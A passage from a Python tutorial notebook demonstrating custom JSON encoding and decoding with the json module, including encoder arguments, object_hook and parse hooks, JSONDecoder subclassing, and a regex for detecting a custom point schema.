    If ``skipkeys`` is true then ``dict`` keys that are not basic types
    (``str``, ``int``, ``float``, ``bool``, ``None``) will be skipped
    instead of raising a ``TypeError``.
    
    If ``ensure_ascii`` is false, then the return value can contain non-ASCII
    characters if they appear in strings contained in ``obj``. Otherwise, all
    such characters are escaped in JSON strings.
    
    If ``check_circular`` is false, then the circular reference check
    for container types will be skipped and a circular reference will
    result in an ``OverflowError`` (or worse).
    
    If ``allow_nan`` is false, then it will be a ``ValueError`` to
    serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
    stric

And let's see the signature for `JSONEncoder`:

In [11]:
help(json.JSONEncoder)

Help on class JSONEncoder in module json.encoder:

class JSONEncoder(builtins.object)
 |  Extensible JSON <http://json.org> encoder for Python data structures.
 |  
 |  Supports the following objects and types by default:
 |  
 |  +-------------------+---------------+
 |  | Python            | JSON          |
 |  | dict              | object        |
 |  +-------------------+---------------+
 |  | list, tuple       | array         |
 |  +-------------------+---------------+
 |  | str               | string        |
 |  +-------------------+---------------+
 |  | int, float        | number        |
 |  +-------------------+---------------+
 |  | True              | true          |
 |  +-------------------+---------------+
 |  | False             | false         |
 |  +-------------------+---------------+
 |  | None              | null          |
 |  +-------------------+---------------+
 |  
 |  To extend this to recognize other objects, subclass and implement a
 |  ``.default()`` metho

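Here we are particularly interested in the `__init__` method signature:

 `__init__(self, *, skipkeys=False, ensure_ascii=True, check_circular=True, allow_nan=True, sort_keys=False, indent=None, separators=None, default=None)`

Compare it with the signature of `dumps`:

`dumps(obj, *, skipkeys=False, ensure_ascii=True, check_circular=True, allow_nan=True, cls=None, indent=None, separators=None, default=None, sort_keys=False, **kw)`

Most of the keyword-only arguments are the same: `dumps` simply passes them along to the encoder class when it creates the encoder instance. Let's look at what a few of them do.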

In [12]:
d = {
    'a': float('inf'),
    'b': [1, 2, 3]
}

In [13]:
d

{'a': inf, 'b': [1, 2, 3]}

In [14]:
type(d['a'])

float

As you can see, that value is still a regular `float` - a special one that represents positive infinity.

Let's see if Python can encode that:

In [15]:
json.dumps(d)

'{"a": Infinity, "b": [1, 2, 3]}'

Yes, it does - but notice the output, `Infinity`. Technically this is not JSON... (see https://tools.ietf.org/html/rfc4627 Section 2.4)

So, if we want to be strict about this, and ensure we are not trying to serialize a value such as infinity, we would do this instead:

In [16]:
json.dumps(d, allow_nan=False)

ValueError: Out of range float values are not JSON compliant

And we get the desired result.
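If we would rather emit valid JSON than raise, one option is to replace such values before serializing. This is only a sketch under the assumption that `null` is an acceptable stand-in for non-finite floats; the helper name `replace_non_finite` is hypothetical:

```python
import json
import math

def replace_non_finite(obj):
    # swap inf, -inf and nan for None, walking dicts and lists recursively
    if isinstance(obj, float) and not math.isfinite(obj):
        return None
    if isinstance(obj, dict):
        return {k: replace_non_finite(v) for k, v in obj.items()}
    if isinstance(obj, (list, tuple)):
        return [replace_non_finite(v) for v in obj]
    return obj

d = {'a': float('inf'), 'b': [1, 2, float('nan')]}

# allow_nan=False now acts as a safety net rather than the main check
encoded = json.dumps(replace_non_finite(d), allow_nan=False)
print(encoded)
```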

What about trying to encode an invalid key (from JSON's perspective)?

In [17]:
d = {10: "int", 10.5: "float", 1+1j: "complex"}

In [18]:
d

{10: 'int', 10.5: 'float', (1+1j): 'complex'}

These are all valid Python dictionary keys, but what happens with JSON encoding?

In [19]:
json.dumps(d)

TypeError: keys must be a string

As you can see we get an exception. We may want to simply ignore that exception and not include the offending key/value pair in our serialization:

In [20]:
json.dumps(d, skipkeys=True)

'{"10": "int", "10.5": "float"}'

And now we no longer get an exception, and the complex key was simply skipped.
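If silently dropping entries is not what we want, another option is to convert the keys ourselves before serializing. A minimal sketch for a flat (non-nested) dictionary, using each key's string representation, which is an arbitrary choice made here for illustration:

```python
import json

d = {10: 'int', 10.5: 'float', 1 + 1j: 'complex'}

# build a new dictionary whose keys are all strings
stringified = {str(key): value for key, value in d.items()}

encoded = json.dumps(stringified)
print(encoded)
```

Keep in mind that whoever decodes this JSON gets string keys back, so the original key types have to be reconstructed separately if they matter.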

We can even change how the serialization is rendered (which of course means we may no longer have actual JSON):

In [21]:
d = {
    'name': 'Python',
    'age': 27,
    'created_by': 'Guido van Rossum',
    'list': [1, 2, 3]
}

In [22]:
json.dumps(d)

'{"name": "Python", "age": 27, "created_by": "Guido van Rossum", "list": [1, 2, 3]}'

In [23]:
print(json.dumps(d, indent='---', separators=('', ' = ')))

{
---"name" = "Python"
---"age" = 27
---"created_by" = "Guido van Rossum"
---"list" = [
------1
------2
------3
---]
}


We can use this, by the way, to create more compact JSON strings (using fewer bytes):

In [24]:
print(json.dumps(d))

{"name": "Python", "age": 27, "created_by": "Guido van Rossum", "list": [1, 2, 3]}


vs

In [25]:
print(json.dumps(d, separators=(',', ':')))

{"name":"Python","age":27,"created_by":"Guido van Rossum","list":[1,2,3]}


As you can see, all the whitespace between the JSON tokens is eliminated (whitespace inside the strings is, of course, preserved). For transmitting large JSON objects, that can make a (relatively small) difference in the size of the payload.
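To put a number on it, this small sketch measures both encodings of the same dictionary (the variable names are just for illustration):

```python
import json

d = {
    'name': 'Python',
    'age': 27,
    'created_by': 'Guido van Rossum',
    'list': [1, 2, 3]
}

default_json = json.dumps(d)
compact_json = json.dumps(d, separators=(',', ':'))

# the text is pure ASCII here, so each character is one byte
default_size = len(default_json.encode('utf-8'))
compact_size = len(compact_json.encode('utf-8'))

print(default_size, compact_size, default_size - compact_size)

# both strings decode to the same data
same_data = json.loads(default_json) == json.loads(compact_json)
```

The saving is one byte per separator, so it grows with the number of keys and array elements, not with the size of the values.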

So, if we want to consistently use the same values for all those tweaks, we have to consistently remember to set the arguments correctly in the `dump`/`dumps` functions.

Instead, we could create a custom JSONEncoder class that pre-sets all these things, and just use that encoder - simpler than remembering all those arguments and their correct values:

In [26]:
class CustomEncoder(json.JSONEncoder):
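    def __init__(self, *args, **kwargs):
        # deliberately ignore the arguments that `dumps` passes in,
        # and always use the pre-set values below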
        super().__init__(skipkeys=True, 
                         allow_nan=False, 
                         indent='---', 
                         separators=('', ' = ')
                        )
        
    def default(self, arg):
        if isinstance(arg, datetime):
            return arg.isoformat()
        else:
            return super().default(arg)

In [27]:
d = {
    'time': datetime.utcnow(),
    1+1j: "complex",
    'name': 'Python'
}

In [28]:
print(json.dumps(d, cls=CustomEncoder))

{
---"time" = "2018-12-29T22:27:26.689488"
---"name" = "Python"
}
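An encoder like the one above discards every argument that `dumps` hands to it, so something like `indent=2` in the `dumps` call would have no effect. A possible variation, sketched here under the assumption that we only want to force `skipkeys` and `allow_nan` and leave the formatting to the caller (the class name `PresetEncoder` is hypothetical):

```python
import json

class PresetEncoder(json.JSONEncoder):
    def __init__(self, **kwargs):
        # force the settings we always want...
        kwargs['skipkeys'] = True
        kwargs['allow_nan'] = False
        # ...and pass everything else (indent, separators, etc.) through
        super().__init__(**kwargs)

d = {'name': 'Python', 1 + 1j: 'complex'}

compact = json.dumps(d, cls=PresetEncoder, separators=(',', ':'))
pretty = json.dumps(d, cls=PresetEncoder, indent=2)

print(compact)
print(pretty)
```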


Another thing I want to point out is that with both these methods we are not limited in what we emit as our JSON serialization.

For example, for a `datetime` object, we may want to emit not only the ISO formatted date, but maybe some additional fields, all nested within a JSON object:

In [29]:
class CustomEncoder(json.JSONEncoder):
    def default(self, arg):
        if isinstance(arg, datetime):
            obj = dict(
                datatype="datetime",
                iso=arg.isoformat(),
                date=arg.date().isoformat(),
                time=arg.time().isoformat(),
                year=arg.year,
                month=arg.month,
                day=arg.day,
                hour=arg.hour,
                minutes=arg.minute,
                seconds=arg.second
            )
            return obj
        else:
            return super().default(arg)

In [30]:
d = {
    'time': datetime.utcnow(),
    'message': 'Testing...'
}

In [31]:
print(json.dumps(d, cls=CustomEncoder, indent=2))

{
  "time": {
    "datatype": "datetime",
    "iso": "2018-12-29T22:27:27.668208",
    "date": "2018-12-29",
    "time": "22:27:27.668208",
    "year": 2018,
    "month": 12,
    "day": 29,
    "hour": 22,
    "minutes": 27,
    "seconds": 27
  },
  "message": "Testing..."
}


##  Custom JSON Decoding

So far we have looked at how to encode (serialize) Python objects to JSON, using the standard as well as custom object serializers.

Now we need to turn our attention to the reverse process - deserializing (decoding) JSON data.

Once again, the standard simple types such as strings, numbers (ints and floats), arrays, and objects with key/value pairs are handled for us out of the box.

JSON has a single array type, with no distinction like the one between Python's mutable lists and immutable tuples - so everything that is an array (`[...]`) in JSON will get decoded into a list object.

Let's see a quick example of how to do this:

In [1]:
j = '''
    {
        "name": "Python",
        "age": 27,
        "versions": ["2.x", "3.x"]
    }
'''

In [2]:
import json

In [3]:
json.loads(j)

{'name': 'Python', 'age': 27, 'versions': ['2.x', '3.x']}

But what about other data types, such as a date for example. How can we handle that?

In [4]:
p = '''
    {
        "time": "2018-10-21T09:14:00",
        "message": "created this json string"
    }
'''

In [5]:
json.loads(p)

{'time': '2018-10-21T09:14:00', 'message': 'created this json string'}

The deserialization worked just fine, but you'll notice that the dictionary entry for `time` contains a string, not a date. 

This is not a trivial problem, and many 3rd party libraries have been written to deserialize specialized JSON structures into custom Python objects. It basically boils down to having a specific structure (schema) in the JSON and manually loading up some custom (or standard) Python object by specifically looking for certain elements and objects in the JSON object. Remember that JSON only supports a few basic types, so anything beyond that is really a custom **interpretation** of the data in the JSON object.

For example, suppose we have a JSON object where any object that contains the key/value pair `"objecttype": "datetime"` is guaranteed to contain another key called `"value"` containing a date time in the format `%Y-%m-%dT%H:%M:%S`.

We could easily do the following:

In [6]:
p = '''
    {
        "time": {
            "objecttype": "datetime",
            "value": "2018-10-21T09:14:15"
            },
        "message": "created this json string"
    }
'''

In [7]:
d = json.loads(p)

In [8]:
d

{'time': {'objecttype': 'datetime', 'value': '2018-10-21T09:14:15'},
 'message': 'created this json string'}

We could now run through our dictionary (top level only, we'll come back to that), and convert any datetime structures (schema) into actual datetime objects:

In [9]:
from datetime import datetime

for key, value in d.items():
    if (isinstance(value, dict) and 
        'objecttype' in value and 
        value['objecttype'] == 'datetime'):
        d[key] = datetime.strptime(value['value'], '%Y-%m-%dT%H:%M:%S')

In [10]:
d

{'time': datetime.datetime(2018, 10, 21, 9, 14, 15),
 'message': 'created this json string'}

As you can see that worked just fine.
We can do this with other "custom" JSON schemas as well.

Let's say we have a JSON schema that will encode fractions using a `fraction` type indicator and associated keys `numerator` and `denominator` with integer values, such as:

```
"pieSlice": {
    "objecttype": "fraction",
    "numerator": 1,
    "denominator": 3
    }
```

We can deal with this in the same way as before:

In [11]:
j = '''
    {
        "cake": "yummy chocolate cake",
        "myShare": {
            "objecttype": "fraction",
            "numerator": 1,
            "denominator": 8
        }
    }
'''

In [12]:
d = json.loads(j)

In [13]:
d

{'cake': 'yummy chocolate cake',
 'myShare': {'objecttype': 'fraction', 'numerator': 1, 'denominator': 8}}

In [14]:
from fractions import Fraction

for key, value in d.items():
    if (isinstance(value, dict) and
        'objecttype' in value and
        value['objecttype'] == 'fraction'):
        numerator = value['numerator']
        denominator = value['denominator']
        d[key] = Fraction(numerator, denominator)

In [15]:
d

{'cake': 'yummy chocolate cake', 'myShare': Fraction(1, 8)}

We can even extend this to custom objects, as long as they follow a specific structure (schema). We could put all this code into a function, even one that can handle multiple types, and clean it up quite a bit.

But...

A few things:
1. It's a real pain having to go through the dictionary after the fact and convert the objects
2. Our conversion code only considered top-level objects - what if they are nested deeper in the JSON object - we would need to deal with that possibility.
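To see what dealing with nesting by hand would involve, here is a rough sketch of a recursive version of the conversion loop. The function name `convert_nested` and the sample JSON are made up for this illustration, and only the `datetime` schema is handled:

```python
import json
from datetime import datetime

def convert_nested(obj):
    # walk dicts and lists recursively, converting datetime schemas
    if isinstance(obj, dict):
        if obj.get('objecttype') == 'datetime':
            return datetime.strptime(obj['value'], '%Y-%m-%dT%H:%M:%S')
        return {key: convert_nested(value) for key, value in obj.items()}
    if isinstance(obj, list):
        return [convert_nested(item) for item in obj]
    return obj

p = '''
    {
        "times": {
            "created": {
                "objecttype": "datetime",
                "value": "2018-10-21T09:14:15"
            }
        },
        "history": [
            {"objecttype": "datetime", "value": "2018-10-22T10:00:05"}
        ],
        "message": "nested"
    }
'''

d = convert_nested(json.loads(p))
print(d)
```

It works, but we are now maintaining our own traversal of a structure that the JSON decoder has already walked through once.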

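There has to be a better way!

And there is: `load`/`loads` accept an `object_hook` argument, a callable that Python calls with every JSON object it decodes (as a `dict`), and whose return value is used in place of that `dict`. Let's first see when it gets called: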

In [16]:
def custom_decoder(arg):
    print('decoding: ', arg)
    return arg

In [17]:
j = '''
    {
        "a": 1,
        "b": 2, 
        "c": {
            "c.1": 1,
            "c.2": 2,
            "c.3": {
                "c.3.1": 1,
                "c.3.2": 2
            }
        }
    }
'''

In [18]:
d = json.loads(j, object_hook=custom_decoder)

decoding:  {'c.3.1': 1, 'c.3.2': 2}
decoding:  {'c.1': 1, 'c.2': 2, 'c.3': {'c.3.1': 1, 'c.3.2': 2}}
decoding:  {'a': 1, 'b': 2, 'c': {'c.1': 1, 'c.2': 2, 'c.3': {'c.3.1': 1, 'c.3.2': 2}}}


As you can see, it called our decoder three times, innermost object first: for the value of the key `c.3`, then for the value of the key `c`, and finally for the root object itself.
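The hook is only called for JSON objects, never for arrays or simple values, although objects nested inside arrays are still visited. A small sketch to confirm this (the `record` function and the `seen` list are hypothetical names):

```python
import json

seen = []

def record(arg):
    # remember every dictionary the decoder hands to us
    seen.append(arg)
    return arg

j = '[1, {"a": 1}, [{"b": 2}], "text"]'
result = json.loads(j, object_hook=record)

print(seen)
print(result)
```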

Now, let's write a decoder that will handle the datetime JSON we worked with earlier:

In [19]:
j = '''
    {
        "time": {
            "objecttype": "datetime",
            "value": "2018-10-21T09:14:15"
            },
        "message": "created this json string"
    }
'''

In [20]:
def custom_decoder(arg):
    if 'objecttype' in arg and arg['objecttype'] == 'datetime':
        return datetime.strptime(arg['value'], '%Y-%m-%dT%H:%M:%S')
    else:
        return arg  # important, otherwise we lose anything that's not a date!

Let's just see how it works as a plain function first:

In [21]:
custom_decoder(dict(objecttype='datetime', value='2018-10-21T09:14:15'))

datetime.datetime(2018, 10, 21, 9, 14, 15)

In [22]:
custom_decoder(dict(a=1))

{'a': 1}

In [23]:
d = json.loads(j, object_hook=custom_decoder)

In [24]:
d

{'time': datetime.datetime(2018, 10, 21, 9, 14, 15),
 'message': 'created this json string'}

The nice thing about this approach is that our code is simpler, and it works for nested items too:

In [25]:
j = '''
    {
        "times": {
            "created": {
                "objecttype": "datetime",
                "value": "2018-10-21T09:14:15"
                },
            "updated": {
                "objecttype": "datetime",
                "value": "2018-10-22T10:00:05"
                }
            },
        "message": "log message here..."
    }
'''

In [26]:
d = json.loads(j, object_hook=custom_decoder)

In [27]:
d

{'times': {'created': datetime.datetime(2018, 10, 21, 9, 14, 15),
  'updated': datetime.datetime(2018, 10, 22, 10, 0, 5)},
 'message': 'log message here...'}

We can also extend this custom decoder to include other structures (schemas). Let's add in our fraction decoder:

In [28]:
def custom_decoder(arg):
    ret_value = arg
    if 'objecttype' in arg:
        if arg['objecttype'] == 'datetime':
            ret_value = datetime.strptime(arg['value'], '%Y-%m-%dT%H:%M:%S')
        elif arg['objecttype'] == 'fraction':
            ret_value = Fraction(arg['numerator'], arg['denominator'])
    return ret_value

In [29]:
j = '''
    {
        "cake": "yummy chocolate cake",
        "myShare": {
            "objecttype": "fraction",
            "numerator": 1,
            "denominator": 8
        },
        "eaten": {
            "at": {
                "objecttype": "datetime",
                "value": "2018-10-21T21:30:00"
                },
            "time_taken": "30 seconds"
        }
    }
'''

In [30]:
d = json.loads(j, object_hook=custom_decoder)

In [31]:
print(d)

{'cake': 'yummy chocolate cake', 'myShare': Fraction(1, 8), 'eaten': {'at': datetime.datetime(2018, 10, 21, 21, 30), 'time_taken': '30 seconds'}}


We can't really use the generic single dispatch approach we took with the encoder though - the decoder always receives a dictionary, so there is no type to dispatch on.
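What we can do instead is dispatch on the value of the `objecttype` key ourselves. One possible sketch uses a plain dictionary as a registry (the names `DECODERS` and `registry_decoder` are hypothetical, not part of the `json` module):

```python
import json
from datetime import datetime
from fractions import Fraction

# maps an objecttype value to the function that builds the Python object
DECODERS = {
    'datetime': lambda arg: datetime.strptime(arg['value'],
                                              '%Y-%m-%dT%H:%M:%S'),
    'fraction': lambda arg: Fraction(arg['numerator'], arg['denominator']),
}

def registry_decoder(arg):
    decoder = DECODERS.get(arg.get('objecttype'))
    # unknown or missing objecttype: return the dictionary unchanged
    return decoder(arg) if decoder else arg

j = '''
    {
        "myShare": {"objecttype": "fraction", "numerator": 1, "denominator": 8},
        "at": {"objecttype": "datetime", "value": "2018-10-21T21:30:00"},
        "other": {"objecttype": "unknown", "value": 1}
    }
'''

d = json.loads(j, object_hook=registry_decoder)
print(d)
```

Supporting a new schema then means adding one entry to the registry instead of another `elif` branch.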

We still have the issue of custom objects and classes - how do we handle those?

Well, in pretty much the same way as before - the content of the JSON has to indicate that the object is of a certain "type", and we can then decode it ourselves.

Let's see a simple example:

In [32]:
class Person:
    def __init__(self, name, ssn):
        self.name = name
        self.ssn = ssn
        
    def __repr__(self):
        return f'Person(name={self.name}, ssn={self.ssn})'

In [33]:
j = '''
    {
        "accountHolder": {
            "objecttype": "person",
            "name": "Eric Idle",
            "ssn": 100
        },
        "created": {
            "objecttype": "datetime",
            "value": "2018-10-21T03:00:00"
        }
    }
'''

In [34]:
def custom_decoder(arg):
    ret_value = arg
    if 'objecttype' in arg:
        if arg['objecttype'] == 'datetime':
            ret_value = datetime.strptime(arg['value'], '%Y-%m-%dT%H:%M:%S')
        elif arg['objecttype'] == 'fraction':
            ret_value = Fraction(arg['numerator'], arg['denominator'])
        elif arg['objecttype'] == 'person':
            ret_value = Person(arg['name'], arg['ssn'])
    return ret_value

In [35]:
d = json.loads(j, object_hook=custom_decoder)

In [36]:
d

{'accountHolder': Person(name=Eric Idle, ssn=100),
 'created': datetime.datetime(2018, 10, 21, 3, 0)}

We could also provide our custom JSON encoder in the person class to serialize that class in the way we expect when deserializing, as we saw in an earlier video:

In [37]:
class Person:
    def __init__(self, name, ssn):
        self.name = name
        self.ssn = ssn
        
    def __repr__(self):
        return f'Person(name={self.name}, ssn={self.ssn})'
    
    def toJSON(self):
        return dict(objecttype='person', name=self.name, ssn=self.ssn)

We can then encode using the techniques we have seen before, and decode using the technique we learned in this video.
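As a rough sketch of the full round trip, assuming the `toJSON` convention above: the helper names `encode_custom` and `decode_custom` are hypothetical, and `default=` is just one of the encoding techniques we could use here.

```python
import json

class Person:
    def __init__(self, name, ssn):
        self.name = name
        self.ssn = ssn

    def toJSON(self):
        return dict(objecttype='person', name=self.name, ssn=self.ssn)

def encode_custom(obj):
    # json.dumps calls this only for objects it cannot serialize itself
    if hasattr(obj, 'toJSON'):
        return obj.toJSON()
    raise TypeError(f'{type(obj).__name__} is not JSON serializable')

def decode_custom(arg):
    # called for every JSON object; rebuild a Person when we see our marker
    if arg.get('objecttype') == 'person':
        return Person(arg['name'], arg['ssn'])
    return arg

serialized = json.dumps({'accountHolder': Person('Eric Idle', 100)},
                        default=encode_custom)
restored = json.loads(serialized, object_hook=decode_custom)
print(serialized)
print(type(restored['accountHolder']).__name__, restored['accountHolder'].name)
```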

There are also a few customized hooks for integers, floats and certain special strings (`-Infinity`, `Infinity` and `NaN`).

For example, we may want to decode floats using a `Decimal` instead of the standard float.

We could do this by using the `parse_float` argument as follows:

In [38]:
from decimal import Decimal
def make_decimal(arg):
    print('Received:', type(arg), arg)
    return Decimal(arg)

In [39]:
j = '''
    {
        "a": 100,
        "b": 0.2,
        "c": 0.5
    }
'''

In [40]:
d = json.loads(j, parse_float=make_decimal)

Received: <class 'str'> 0.2
Received: <class 'str'> 0.5


In [41]:
d

{'a': 100, 'b': Decimal('0.2'), 'c': Decimal('0.5')}

As you can see we have decimals in our dictionary, instead of floats. Note also that the argument we receive is a string - it would make little sense for us to receive a float since our function is the one that wants to specifically handle converting a JSON string to some particular type.
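Here is a small sketch of why receiving the original string matters: passing `Decimal` itself as `parse_float` keeps the exact decimal digits from the document, whereas the default float conversion introduces binary rounding. The sample values are chosen only for illustration.

```python
import json
from decimal import Decimal

sample = '{"b": 0.1, "c": 0.2}'

as_float = json.loads(sample)
as_decimal = json.loads(sample, parse_float=Decimal)

# floats carry binary rounding error, so the sum is not exactly 0.3
print(as_float['b'] + as_float['c'] == 0.3)

# Decimal was built from the strings "0.1" and "0.2", so the sum is exact
print(as_decimal['b'] + as_decimal['c'] == Decimal('0.3'))
```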

We can also intercept handling of integers and those constant values I mentioned.

In [42]:
j = '''
    {
        "a": 100,
        "b": Infinity
    }
'''

In [43]:
json.loads(j)

{'a': 100, 'b': inf}

In [44]:
def make_int_binary(arg):
    print('Received:', type(arg), arg)
    return bin(int(arg))

In [45]:
def make_const_none(arg):
    print('Received:', type(arg), arg)
    return None

In [46]:
json.loads(j, 
           parse_int=make_int_binary, 
           parse_constant=make_const_none)

Received: <class 'str'> 100
Received: <class 'str'> Infinity


{'a': '0b1100100', 'b': None}

Again note that in all cases, the received argument is the **string** read from the json string.
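Since `Infinity`, `-Infinity` and `NaN` are not part of standard JSON, another possible use of `parse_constant` is to reject them outright. This is just a sketch, and the function name `reject_constant` is made up for the example:

```python
import json

def reject_constant(arg):
    # arg is the string read from the document, e.g. 'Infinity' or 'NaN'
    raise ValueError(f'non-standard JSON constant: {arg}')

try:
    json.loads('{"a": 100, "b": Infinity}', parse_constant=reject_constant)
except ValueError as ex:
    message = str(ex)
    print(message)
```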

Finally we have the `object_pairs_hook` argument. It works similarly to the `object_hook` with two differences:
1. the argument is a `list` of 2-tuples - the first value is the key, the second is the value
2. the list is ordered in the same order as the keys in the json document.

Remember that the dictionary is not **guaranteed** to be ordered in the same order as the keys in the json document - given that dictionaries preserve insertion order in Python 3.6+ (as a CPython implementation detail in 3.6, and as a language guarantee from 3.7), this is likely to be true, but the documentation does not mention this specifically, so at this point it should be considered an implementation detail and not relied on - if you **must** have guaranteed key order, then you will have to use the `object_pairs_hook`.

Also, you should not specify both `object_hook` and `object_pairs_hook` - if you do, then the `object_pairs_hook` will be used and `object_hook` will be ignored.
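One simple way to get an explicitly ordered result, sketched here with `collections.OrderedDict` (which accepts a list of key/value pairs), is to pass it directly as the hook:

```python
import json
from collections import OrderedDict

# OrderedDict can be built from a list of 2-tuples, which is exactly
# what object_pairs_hook receives
ordered = json.loads('{"z": 1, "a": 2, "m": 3}', object_pairs_hook=OrderedDict)
print(ordered)
print(list(ordered))
```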

In [47]:
j = '''
    {
        "a": [1, 2, 3, 4, 5],
        "b": 100,
        "c": 10.5,
        "d": NaN,
        "e": null,
        "f": "python"
    }
'''

In [48]:
def float_handler(arg):
    print('float handler', type(arg), arg)
    return float(arg)

In [49]:
def int_handler(arg):
    print('int handler', type(arg), arg)
    return int(arg)

In [50]:
def const_handler(arg):
    print('const handler', type(arg), arg)
    return None

In [51]:
def obj_hook(arg):
    print('obj hook', type(arg), arg)
    return arg

In [52]:
def obj_pairs_hook(arg):
    print('obj pairs hook', type(arg), arg)
    return arg

In [53]:
json.loads(j)

{'a': [1, 2, 3, 4, 5], 'b': 100, 'c': 10.5, 'd': nan, 'e': None, 'f': 'python'}

In [54]:
json.loads(j, 
           object_hook=obj_hook,
           parse_float=float_handler,
           parse_int=int_handler,
           parse_constant=const_handler
          )

int handler <class 'str'> 1
int handler <class 'str'> 2
int handler <class 'str'> 3
int handler <class 'str'> 4
int handler <class 'str'> 5
int handler <class 'str'> 100
float handler <class 'str'> 10.5
const handler <class 'str'> NaN
obj hook <class 'dict'> {'a': [1, 2, 3, 4, 5], 'b': 100, 'c': 10.5, 'd': None, 'e': None, 'f': 'python'}


{'a': [1, 2, 3, 4, 5],
 'b': 100,
 'c': 10.5,
 'd': None,
 'e': None,
 'f': 'python'}

In [55]:
json.loads(j, 
           object_pairs_hook=obj_pairs_hook,
           parse_float=float_handler,
           parse_int=int_handler,
           parse_constant=const_handler
          )

int handler <class 'str'> 1
int handler <class 'str'> 2
int handler <class 'str'> 3
int handler <class 'str'> 4
int handler <class 'str'> 5
int handler <class 'str'> 100
float handler <class 'str'> 10.5
const handler <class 'str'> NaN
obj pairs hook <class 'list'> [('a', [1, 2, 3, 4, 5]), ('b', 100), ('c', 10.5), ('d', None), ('e', None), ('f', 'python')]


[('a', [1, 2, 3, 4, 5]),
 ('b', 100),
 ('c', 10.5),
 ('d', None),
 ('e', None),
 ('f', 'python')]

And if we specify both object hooks, then `object_hook` is basically ignored:

In [56]:
json.loads(j, 
           object_hook=obj_hook,
           object_pairs_hook=obj_pairs_hook,
           parse_float=float_handler,
           parse_int=int_handler,
           parse_constant=const_handler
          )

int handler <class 'str'> 1
int handler <class 'str'> 2
int handler <class 'str'> 3
int handler <class 'str'> 4
int handler <class 'str'> 5
int handler <class 'str'> 100
float handler <class 'str'> 10.5
const handler <class 'str'> NaN
obj pairs hook <class 'list'> [('a', [1, 2, 3, 4, 5]), ('b', 100), ('c', 10.5), ('d', None), ('e', None), ('f', 'python')]


[('a', [1, 2, 3, 4, 5]),
 ('b', 100),
 ('c', 10.5),
 ('d', None),
 ('e', None),
 ('f', 'python')]
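Because `object_pairs_hook` sees every key/value pair before a dictionary is built, it can also catch duplicate keys, which a plain dictionary would silently collapse (the last value wins). A minimal sketch, where the name `reject_duplicates` is only illustrative:

```python
import json

def reject_duplicates(pairs):
    result = {}
    for key, value in pairs:
        if key in result:
            raise ValueError(f'duplicate key: {key!r}')
        result[key] = value
    return result

# the default behavior keeps only the last value
print(json.loads('{"a": 1, "a": 2}'))

try:
    json.loads('{"a": 1, "a": 2}', object_pairs_hook=reject_duplicates)
except ValueError as ex:
    error = str(ex)
    print(error)
```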

As we saw in the decoding videos, we can also subclass the `JSONDecoder` class (just like we subclassed the `JSONEncoder`) - we'll look at this next.

##  Using JSONDecoder

Just like we can use a subclass of `JSONEncoder` to customize our json encodings, we can use a subclass of the default `JSONDecoder` class to customize decoding our json strings.

It works quite differently from the `JSONEncoder` subclassing though.

When we subclass `JSONEncoder` we override the `default` method which then allows us to intercept encoding of specific types of objects, and delegate back to the parent class what we don't want to handle specifically.

With the `JSONDecoder` class we override the `decode` function which passes us the **entire** JSON as a **string** and we have to return whatever Python object we want. There's no delegating anything back to the parent class unless we want to completely skip customizing the output.

Let's first see how the functions work:

In [1]:
import json

In [2]:
j = '''
    {
        "a": 100,
        "b": [1, 2, 3],
        "c": "python",
        "d": {
            "e": 4,
            "f": 5.5
        }
    }
'''

In [3]:
class CustomDecoder(json.JSONDecoder):
    def decode(self, arg):
        print("decode:", type(arg), arg)
        return "a simple string object"

In [4]:
json.loads(j, cls=CustomDecoder)

As you can see, whatever we return from the `decode` method is the **result** of calling `loads`.

So, we might want to intercept certain JSON strings, handling them in some custom way, and delegate back to the parent class if it's not a string we want to handle ourselves - but it's all or nothing.

Let's see an example of how we might want to use this:

In [5]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'Point(x={self.x}, y={self.y})'

In [6]:
j_points = '''
{
    "points": [
        [10, 20],
        [-1, -2],
        [0.5, 0.5]
    ]
}
'''

j_other = '''
{
    "a": 1,
    "b": 2
}
'''

In [7]:
class CustomDecoder(json.JSONDecoder):
    def decode(self, arg):
        if 'points' in arg:
            obj = json.loads(arg)
            return "parsing object for points"
        else:
            return super().decode(arg)

In [8]:
json.loads(j_points, cls=CustomDecoder)

In [9]:
json.loads(j_other, cls=CustomDecoder)

{'a': 1, 'b': 2}

So, let's implement the custom decoder now, assuming that `points` will be a top level node in the JSON object:

In [10]:
class CustomDecoder(json.JSONDecoder):
    def decode(self, arg):
        obj = json.loads(arg)
        if 'points' in obj:  # top level
            obj['points'] = [Point(x, y) 
                             for x, y in obj['points']]
        return obj

In [11]:
json.loads(j_points, cls=CustomDecoder)

{'points': [Point(x=10, y=20), Point(x=-1, y=-2), Point(x=0.5, y=0.5)]}

In [12]:
json.loads(j_other, cls=CustomDecoder)

{'a': 1, 'b': 2}

Of course, we can be more fancy and maybe handle points by specifying the data type in the JSON object (and again, this is just how **we**, the developers, decide to make that specification).

Here I am going to specify that a `Point` object in the JSON document should be specified using this format:

```
{"_type": "point", "x": x-coord, "y": y-coord}
```

So, when we parse the JSON string we are going to look for such a structure, and do the appropriate type conversion if needed. Of course, we'll have to look recursively in the JSON for this structure. We'll follow the same approach as before, first deserializing to a "generic" Python dict, then replacing any `Point` structure as we find them.

To avoid having to iterate through the deserialized JSON object when we don't have that structure there in the first place, I'm going to look for `"_type": "point"` in the **string**. Technically we also need to look for `"_type":"point"` since both, from a JSON object perspective, are the same thing. In fact any amount of whitespace surrounding the `:` is acceptable. Handling that with an ordinary string search would be possible, but would result in very unwieldy and convoluted code, so I'm going to use a regular expression instead (if you need help getting started with regular expressions, I highly recommend using this site):

https://regexr.com/

In [13]:
import re
pattern = r'"_type"\s*:\s*"point"'

In this pattern, `\s` simply means a whitespace character, and the `*` right after it means zero or more times.

Also note that we prefix that string with `r` to tell Python not to interpret the `\` as anything special - otherwise Python will try to interpret it, when combined with the character that follows, as an escape sequence.

Let's see a quick example of this first:

In [14]:
print('word1\tword2')

word1	word2


In [15]:
print(r'word1\tword2')

word1\tword2


Notice the difference? Since we use the `\` character a lot in regular expressions, we should always use this `r` prefix which indicates a **raw** string, and Python will not try to recognize escape sequences in our pattern.

So, now let's continue testing out our regular expression pattern. We'll compile it so we can re-use it, but you don't have to.

Once we have it compiled, we can use the `search` method that will find the first occurrence of the pattern in our search string, or return `None` if it was not found:

In [16]:
regexp = re.compile(pattern)

In [17]:
print(regexp.search('"a": 1'))

None


In [18]:
print(regexp.search('"_type": "point"'))

<_sre.SRE_Match object; span=(0, 16), match='"_type": "point"'>


In [19]:
print(regexp.search('"_type"   : "point"'))

